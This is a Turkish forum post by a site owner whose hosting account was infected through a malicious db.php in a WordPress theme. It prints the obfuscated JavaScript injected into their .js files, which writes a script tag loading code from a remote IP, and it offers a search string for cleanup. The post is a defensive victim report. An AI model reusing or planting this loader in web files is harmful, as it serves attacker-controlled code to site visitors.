Merhaba, hostingimde bulunan sitelerin birindeki eklenti, tema veya scriptte bulunan bir açıktan dolayı bütün domainlerimdeki dosyalar zarar gördü.

Tüm sitelere ilk girişte cmp20.com sitesine yönlendirme yapılıyor.

Sorunun çözümü için uğraşlarım devam ediyor. Daha önce bu siteye yönlendirme yapan bir saldırı aldıysanız ve rollback yapmak haricinde bir çözüm yolu bularak manuel veya otomatik temizleme yapabildiyseniz lütfen bilgilendirin.

Rollback harici bir çözüm bulabilirsem konu altına yorum yaparım.

--- Düzenleme Sonrası Aşağıdadır.---

Sebep kullandığım bir wordpress teması çıktı. Wordpress temasında " db.php " isimli bir dosya var bu db.php çalışınca hosting paketimdeki tüm dosyaları etkiledi dolayısıyla tüm domainlerimi.. İşlem sonucunda .js dosyalarımda bozulmalar yapıyor ve oldukça yüksek sayıda..

db.php çalışınca birçok .js dosyamın içeriği;

var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]));';

olarak değişti.


Benim çözümüm ;

Sinirden hosting paketimdeki tüm dosyaları temizlemekle başladı. Paketin ana domaninide değiştirdim. Şimdi tek tek temizlik işlemleri yapıp tekrar hostinge yüklüyorum.

Temizlik işlemine diğer domainlerim de db.php tarzında işlemi başlatacak bir kod olup olmadığını araştırmakla başlıyorum. Aşağıdaki kodu aratarak başladım. Bu kodu başlatan dosyanız varsa direkt temizleyin.

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E"

tüm .jslerinizi kontrol edin..

Düzenli olarak yedek almayı unutmayın !